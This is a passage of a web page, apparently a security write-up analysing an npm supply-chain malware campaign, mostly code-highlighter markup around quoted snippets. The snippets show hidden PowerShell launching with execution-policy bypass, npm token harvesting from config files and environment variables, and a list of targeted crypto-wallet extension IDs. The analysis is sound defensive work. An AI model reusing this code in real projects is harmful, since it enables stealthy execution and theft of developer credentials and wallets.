22\" fill=\"none\">\n                        <path d=\"M19 7H9C7.89543 7 7 7.89543 7 9V19C7 20.1046 7.89543 21 9 21H19C20.1046 21 21 20.1046 21 19V9C21 7.89543 20.1046 7 19 7Z\" stroke-width=\"2\" stroke=\"currentColor\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3 15C1.9 15 1 14.1 1 13V3C1 1.9 1.9 1 3 1H13C14.1 1 15 1.9 15 3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Download Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-download\" aria-label=\"Download code as file\" title=\"Download\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M11 14.3333V1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M21 14.3335V18.7779C21 19.3673 20.7659 19.9325 20.3491 20.3493C19.9324 20.766 19.3671 21.0002 18.7778 21.0002H3.22222C2.63285 21.0002 2.06762 20.766 1.65087 20.3493C1.23413 19.9325 1 19.3673 1 18.7779V14.3335\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.44434 8.77783L10.9999 14.3334L16.5554 8.77783\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Theme Toggle Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-theme\" aria-label=\"Toggle theme\" title=\"Toggle Theme\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\" class=\"section-gutenberg-code-highlight__icon-dark\">\n                        <path d=\"M11 15C13.2091 15 15 13.2091 15 11C15 8.79086 13.2091 7 11 7C8.79086 7 7 8.79086 7 11C7 13.2091 8.79086 15 11 15Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 1V3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 19V21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3.92993 3.93018L5.33993 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.6599 16.6602L18.0699 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M1 11H3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M19 11H21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.33993 16.6602L3.92993 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M18.0699 3.93018L16.6599 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" class=\"section-gutenberg-code-highlight__icon-light\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M20.9992 11.5325C20.895 13.4629 20.2339 15.3218 19.0957 16.8844C17.9576 18.4471 16.3912 19.6466 14.5859 20.3381C12.7806 21.0295 10.8137 21.1832 8.92287 20.7806C7.03207 20.378 5.29836 19.4363 3.93132 18.0694C2.56428 16.7025 1.62243 14.9689 1.21963 13.0781C0.816833 11.1874 0.970326 9.22041 1.66156 7.41502C2.35279 5.60964 3.55217 4.04311 5.1147 2.90483C6.67724 1.76654 8.53604 1.10522 10.4664 1.00081C10.9167 0.976347 11.1524 1.51227 10.9134 1.89365C10.1138 3.17292 9.77145 4.68543 9.94215 6.18433C10.1129 7.68323 10.7865 9.08002 11.8533 10.1468C12.92 11.2135 14.3168 11.8872 15.8157 12.0579C17.3146 12.2286 18.8271 11.8862 20.1064 11.0866C20.4888 10.8476 21.0237 11.0822 20.9992 11.5325Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Open External Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-external\" aria-label=\"Open in new window\" title=\"Open External\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"21\" height=\"21\" viewbox=\"0 0 21 21\" fill=\"none\">\n                        <path d=\"M13.6665 1H19.9998V7.33333\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M8.38892 12.6111L20 1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.8333 11.5559V17.8892C16.8333 18.4491 16.6109 18.9861 16.215 19.382C15.8191 19.7779 15.2821 20.0003 14.7222 20.0003H3.11111C2.55121 20.0003 2.01424 19.7779 1.61833 19.382C1.22242 18.9861 1 18.4491 1 17.8892V6.2781C1 5.7182 1.22242 5.18123 1.61833 4.78532C2.01424 4.38941 2.55121 4.16699 3.11111 4.16699H9.44444\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n            <\/div>\n            <div class=\"section-gutenberg-code-highlight__toolbar-right\">\n                <!-- Language Selector -->\n                <div class=\"section-gutenberg-code-highlight__language-selector\">\n                    <label for=\"language-select-block_ff9eb47c98b30ff13c1f640220ac446c\" class=\"section-gutenberg-code-highlight__language-label\">Language:<\/label>\n                    <select id=\"language-select-block_ff9eb47c98b30ff13c1f640220ac446c\" class=\"section-gutenberg-code-highlight__language-dropdown\" aria-label=\"Select code language\">\n                        <option value=\"auto\">Auto-detect<\/option>\n                        <option value=\"plaintext\">Plain Text<\/option>\n                        <option value=\"bash\">Bash<\/option>\n                        <option value=\"css\">CSS<\/option>\n                        <option value=\"dockerfile\">Dockerfile<\/option>\n                        <option value=\"go\">Go<\/option>\n                        <option value=\"html\">HTML<\/option>\n                        <option value=\"java\">Java<\/option>\n                        <option value=\"javascript\" selected>JavaScript<\/option>\n                        <option value=\"json\">JSON<\/option>\n                        <option value=\"kotlin\">Kotlin<\/option>\n                        <option value=\"markdown\">Markdown<\/option>\n                        <option value=\"php\">PHP<\/option>\n                        <option value=\"python\">Python<\/option>\n                        <option value=\"ruby\">Ruby<\/option>\n                        <option value=\"rust\">Rust<\/option>\n                        <option value=\"sql\">SQL<\/option>\n                        <option value=\"swift\">Swift<\/option>\n                        <option value=\"typescript\">TypeScript<\/option>\n                        <option value=\"xml\">XML<\/option>\n                        <option value=\"yaml\">YAML<\/option>\n                    <\/select>\n                <\/div>\n            <\/div>\n        <\/div>\n\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-javascript\">const folderName = &#039;ozTjbCl&#039;;\r\nconst ps1name = &#039;mwSMNWQsh&#039;;\r\nconst folderPath = path.join(appdataDir, folderName);\r\nconst filePath = path.join(folderPath, &#039;index.js&#039;);\r\n\r\nfs.writeFileSync(filePath, script);\r\nfs.writeFileSync(ps1Path, scriptPS1(filePath, nodePath, ps1Path), &#039;utf-8&#039;);\r\nchildProcess.exec(\r\n  `start \/B powershell.exe -ExecutionPolicy Bypass -Command &quot;&amp; { . &#039;${ps1Path}&#039; }&quot; -WindowStyle Hidden`,\r\n  { detached: true, stdio: &#039;ignore&#039; }\r\n);\r\n\r\n\/\/ Note: this snippet was simplified from the original for readability.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<h3 class=\"wp-block-heading\">npm token theft<\/h3>\n\n\n\n<p>The malware searches for npm authentication tokens through several methods, including:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>npm configuration<\/li>\n\n\n\n<li>.npmrc files<\/li>\n\n\n\n<li>environment variables<\/li>\n<\/ul>\n\n\n\n<p>If a token is found, it is verified through the npm registry using <code>https[:]\/\/registry[.]npmjs[.]org\/-\/whoami<\/code><\/p>\n\n\n\n<p>This is a strong indication that the campaign is not just interested in generic system data or wallets, but also in developer publishing credentials that could be reused for further supply-chain abuse.<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"javascript\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Toolbar -->\n        <div class=\"section-gutenberg-code-highlight__toolbar\">\n            <div class=\"section-gutenberg-code-highlight__toolbar-left\">\n                <!-- Copy Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-copy\" aria-label=\"Copy code to clipboard\" title=\"Copy\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M19 7H9C7.89543 7 7 7.89543 7 9V19C7 20.1046 7.89543 21 9 21H19C20.1046 21 21 20.1046 21 19V9C21 7.89543 20.1046 7 19 7Z\" stroke-width=\"2\" stroke=\"currentColor\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3 15C1.9 15 1 14.1 1 13V3C1 1.9 1.9 1 3 1H13C14.1 1 15 1.9 15 3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Download Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-download\" aria-label=\"Download code as file\" title=\"Download\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M11 14.3333V1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M21 14.3335V18.7779C21 19.3673 20.7659 19.9325 20.3491 20.3493C19.9324 20.766 19.3671 21.0002 18.7778 21.0002H3.22222C2.63285 21.0002 2.06762 20.766 1.65087 20.3493C1.23413 19.9325 1 19.3673 1 18.7779V14.3335\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.44434 8.77783L10.9999 14.3334L16.5554 8.77783\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Theme Toggle Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-theme\" aria-label=\"Toggle theme\" title=\"Toggle Theme\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\" class=\"section-gutenberg-code-highlight__icon-dark\">\n                        <path d=\"M11 15C13.2091 15 15 13.2091 15 11C15 8.79086 13.2091 7 11 7C8.79086 7 7 8.79086 7 11C7 13.2091 8.79086 15 11 15Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 1V3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 19V21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3.92993 3.93018L5.33993 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.6599 16.6602L18.0699 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M1 11H3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M19 11H21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.33993 16.6602L3.92993 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M18.0699 3.93018L16.6599 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" class=\"section-gutenberg-code-highlight__icon-light\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M20.9992 11.5325C20.895 13.4629 20.2339 15.3218 19.0957 16.8844C17.9576 18.4471 16.3912 19.6466 14.5859 20.3381C12.7806 21.0295 10.8137 21.1832 8.92287 20.7806C7.03207 20.378 5.29836 19.4363 3.93132 18.0694C2.56428 16.7025 1.62243 14.9689 1.21963 13.0781C0.816833 11.1874 0.970326 9.22041 1.66156 7.41502C2.35279 5.60964 3.55217 4.04311 5.1147 2.90483C6.67724 1.76654 8.53604 1.10522 10.4664 1.00081C10.9167 0.976347 11.1524 1.51227 10.9134 1.89365C10.1138 3.17292 9.77145 4.68543 9.94215 6.18433C10.1129 7.68323 10.7865 9.08002 11.8533 10.1468C12.92 11.2135 14.3168 11.8872 15.8157 12.0579C17.3146 12.2286 18.8271 11.8862 20.1064 11.0866C20.4888 10.8476 21.0237 11.0822 20.9992 11.5325Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Open External Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-external\" aria-label=\"Open in new window\" title=\"Open External\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"21\" height=\"21\" viewbox=\"0 0 21 21\" fill=\"none\">\n                        <path d=\"M13.6665 1H19.9998V7.33333\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M8.38892 12.6111L20 1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.8333 11.5559V17.8892C16.8333 18.4491 16.6109 18.9861 16.215 19.382C15.8191 19.7779 15.2821 20.0003 14.7222 20.0003H3.11111C2.55121 20.0003 2.01424 19.7779 1.61833 19.382C1.22242 18.9861 1 18.4491 1 17.8892V6.2781C1 5.7182 1.22242 5.18123 1.61833 4.78532C2.01424 4.38941 2.55121 4.16699 3.11111 4.16699H9.44444\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n            <\/div>\n            <div class=\"section-gutenberg-code-highlight__toolbar-right\">\n                <!-- Language Selector -->\n                <div class=\"section-gutenberg-code-highlight__language-selector\">\n                    <label for=\"language-select-block_e3cc7072f7aee654014857e824237d63\" class=\"section-gutenberg-code-highlight__language-label\">Language:<\/label>\n                    <select id=\"language-select-block_e3cc7072f7aee654014857e824237d63\" class=\"section-gutenberg-code-highlight__language-dropdown\" aria-label=\"Select code language\">\n                        <option value=\"auto\">Auto-detect<\/option>\n                        <option value=\"plaintext\">Plain Text<\/option>\n                        <option value=\"bash\">Bash<\/option>\n                        <option value=\"css\">CSS<\/option>\n                        <option value=\"dockerfile\">Dockerfile<\/option>\n                        <option value=\"go\">Go<\/option>\n                        <option value=\"html\">HTML<\/option>\n                        <option value=\"java\">Java<\/option>\n                        <option value=\"javascript\" selected>JavaScript<\/option>\n                        <option value=\"json\">JSON<\/option>\n                        <option value=\"kotlin\">Kotlin<\/option>\n                        <option value=\"markdown\">Markdown<\/option>\n                        <option value=\"php\">PHP<\/option>\n                        <option value=\"python\">Python<\/option>\n                        <option value=\"ruby\">Ruby<\/option>\n                        <option value=\"rust\">Rust<\/option>\n                        <option value=\"sql\">SQL<\/option>\n                        <option value=\"swift\">Swift<\/option>\n                        <option value=\"typescript\">TypeScript<\/option>\n                        <option value=\"xml\">XML<\/option>\n                        <option value=\"yaml\">YAML<\/option>\n                    <\/select>\n                <\/div>\n            <\/div>\n        <\/div>\n\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-javascript\">class NpmTokenHandler {\r\n  retrieveNpmToken() {\r\n    const methods = [\r\n      this.getFromNpmConfig.bind(this),\r\n      this.getFromNpmrcFile.bind(this),\r\n      this.getFromEnv.bind(this)\r\n    ];\r\n    for (const method of methods) {\r\n      const token = method();\r\n      if (token) return token;\r\n    }\r\n    return null;\r\n  }\r\n}\r\n\r\nfetch(&#039;https:\/\/registry.npmjs.org\/-\/whoami&#039;, {\r\n  headers: { Authorization: `Bearer ${this.token}` }\r\n});\r\n\r\n\/\/ Note: this snippet was simplified from the original for readability.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<h3 class=\"wp-block-heading\">Cryptocurrency wallet targeting<\/h3>\n\n\n\n<p>It contains a large built-in mapping of browser and desktop wallet targets, including MetaMask, Phantom, Coinbase, Exodus, Trust Wallet, and many others, and searches profile directories and extension storage paths for matching wallet data, including browser extension storage and desktop wallet locations.<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"javascript\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Toolbar -->\n        <div class=\"section-gutenberg-code-highlight__toolbar\">\n            <div class=\"section-gutenberg-code-highlight__toolbar-left\">\n                <!-- Copy Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-copy\" aria-label=\"Copy code to clipboard\" title=\"Copy\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M19 7H9C7.89543 7 7 7.89543 7 9V19C7 20.1046 7.89543 21 9 21H19C20.1046 21 21 20.1046 21 19V9C21 7.89543 20.1046 7 19 7Z\" stroke-width=\"2\" stroke=\"currentColor\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3 15C1.9 15 1 14.1 1 13V3C1 1.9 1.9 1 3 1H13C14.1 1 15 1.9 15 3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Download Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-download\" aria-label=\"Download code as file\" title=\"Download\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M11 14.3333V1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M21 14.3335V18.7779C21 19.3673 20.7659 19.9325 20.3491 20.3493C19.9324 20.766 19.3671 21.0002 18.7778 21.0002H3.22222C2.63285 21.0002 2.06762 20.766 1.65087 20.3493C1.23413 19.9325 1 19.3673 1 18.7779V14.3335\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.44434 8.77783L10.9999 14.3334L16.5554 8.77783\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Theme Toggle Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-theme\" aria-label=\"Toggle theme\" title=\"Toggle Theme\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\" class=\"section-gutenberg-code-highlight__icon-dark\">\n                        <path d=\"M11 15C13.2091 15 15 13.2091 15 11C15 8.79086 13.2091 7 11 7C8.79086 7 7 8.79086 7 11C7 13.2091 8.79086 15 11 15Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 1V3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 19V21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3.92993 3.93018L5.33993 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.6599 16.6602L18.0699 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M1 11H3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M19 11H21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.33993 16.6602L3.92993 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M18.0699 3.93018L16.6599 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" class=\"section-gutenberg-code-highlight__icon-light\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M20.9992 11.5325C20.895 13.4629 20.2339 15.3218 19.0957 16.8844C17.9576 18.4471 16.3912 19.6466 14.5859 20.3381C12.7806 21.0295 10.8137 21.1832 8.92287 20.7806C7.03207 20.378 5.29836 19.4363 3.93132 18.0694C2.56428 16.7025 1.62243 14.9689 1.21963 13.0781C0.816833 11.1874 0.970326 9.22041 1.66156 7.41502C2.35279 5.60964 3.55217 4.04311 5.1147 2.90483C6.67724 1.76654 8.53604 1.10522 10.4664 1.00081C10.9167 0.976347 11.1524 1.51227 10.9134 1.89365C10.1138 3.17292 9.77145 4.68543 9.94215 6.18433C10.1129 7.68323 10.7865 9.08002 11.8533 10.1468C12.92 11.2135 14.3168 11.8872 15.8157 12.0579C17.3146 12.2286 18.8271 11.8862 20.1064 11.0866C20.4888 10.8476 21.0237 11.0822 20.9992 11.5325Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Open External Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-external\" aria-label=\"Open in new window\" title=\"Open External\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"21\" height=\"21\" viewbox=\"0 0 21 21\" fill=\"none\">\n                        <path d=\"M13.6665 1H19.9998V7.33333\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M8.38892 12.6111L20 1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.8333 11.5559V17.8892C16.8333 18.4491 16.6109 18.9861 16.215 19.382C15.8191 19.7779 15.2821 20.0003 14.7222 20.0003H3.11111C2.55121 20.0003 2.01424 19.7779 1.61833 19.382C1.22242 18.9861 1 18.4491 1 17.8892V6.2781C1 5.7182 1.22242 5.18123 1.61833 4.78532C2.01424 4.38941 2.55121 4.16699 3.11111 4.16699H9.44444\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n            <\/div>\n            <div class=\"section-gutenberg-code-highlight__toolbar-right\">\n                <!-- Language Selector -->\n                <div class=\"section-gutenberg-code-highlight__language-selector\">\n                    <label for=\"language-select-block_37d9d23d971c12f7b5a68f1ecb7f937f\" class=\"section-gutenberg-code-highlight__language-label\">Language:<\/label>\n                    <select id=\"language-select-block_37d9d23d971c12f7b5a68f1ecb7f937f\" class=\"section-gutenberg-code-highlight__language-dropdown\" aria-label=\"Select code language\">\n                        <option value=\"auto\">Auto-detect<\/option>\n                        <option value=\"plaintext\">Plain Text<\/option>\n                        <option value=\"bash\">Bash<\/option>\n                        <option value=\"css\">CSS<\/option>\n                        <option value=\"dockerfile\">Dockerfile<\/option>\n                        <option value=\"go\">Go<\/option>\n                        <option value=\"html\">HTML<\/option>\n                        <option value=\"java\">Java<\/option>\n                        <option value=\"javascript\" selected>JavaScript<\/option>\n                        <option value=\"json\">JSON<\/option>\n                        <option value=\"kotlin\">Kotlin<\/option>\n                        <option value=\"markdown\">Markdown<\/option>\n                        <option value=\"php\">PHP<\/option>\n                        <option value=\"python\">Python<\/option>\n                        <option value=\"ruby\">Ruby<\/option>\n                        <option value=\"rust\">Rust<\/option>\n                        <option value=\"sql\">SQL<\/option>\n                        <option value=\"swift\">Swift<\/option>\n                        <option value=\"typescript\">TypeScript<\/option>\n                        <option value=\"xml\">XML<\/option>\n                        <option value=\"yaml\">YAML<\/option>\n                    <\/select>\n                <\/div>\n            <\/div>\n        <\/div>\n\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-javascript\">var EXTENSION_IDENTIFIERS = {\r\n  MetaMask: &#039;nkbihfbeogaeaoehlefnkodbefgpgknn&#039;,\r\n  Phantom: &#039;bfnaelmomeimhlpmgjnjophhpkkoljpa&#039;,\r\n  Coinbase: &#039;hnfanknocfeofbddgcijnmhnfnkdnaad&#039;,\r\n  Ronin: &#039;fnjhmkhhmkbjkkabndcnnogagogbneec&#039;,\r\n  Trust_Wallet: &#039;egjidjbpglichdcondbcbdnbeeppgdph&#039;,\r\n  Solflare: &#039;bhhhlbepdkbapadjdnnojkbgioiodbic&#039;\r\n};\r\n\r\n\/\/ Note: this snippet was simplified from the original for readability.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<h3 class=\"wp-block-heading\">Archive download, decryption, and native module loading<\/h3>\n\n\n\n<p>The second-stage payload also downloads an archive from the same infrastructure, decrypts a bundled module with AES, and launches it through Node.js.<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"javascript\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Toolbar -->\n        <div class=\"section-gutenberg-code-highlight__toolbar\">\n            <div class=\"section-gutenberg-code-highlight__toolbar-left\">\n                <!-- Copy Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-copy\" aria-label=\"Copy code to clipboard\" title=\"Copy\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M19 7H9C7.89543 7 7 7.89543 7 9V19C7 20.1046 7.89543 21 9 21H19C20.1046 21 21 20.1046 21 19V9C21 7.89543 20.1046 7 19 7Z\" stroke-width=\"2\" stroke=\"currentColor\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3 15C1.9 15 1 14.1 1 13V3C1 1.9 1.9 1 3 